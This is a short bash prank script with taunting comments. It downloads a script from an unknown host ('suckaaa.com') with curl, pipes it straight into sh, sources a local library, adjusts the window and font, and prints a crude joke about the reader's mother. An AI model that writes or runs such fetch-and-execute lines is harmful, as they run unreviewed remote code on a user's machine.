#!/bin/bash

# loL whatcha lookin for in here???
# Don't worry about it!!!

curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;

positionWindow 0 0;
setFontSize 30;

echo "I'm currently in your mothers bed — she's not home yet...!!";
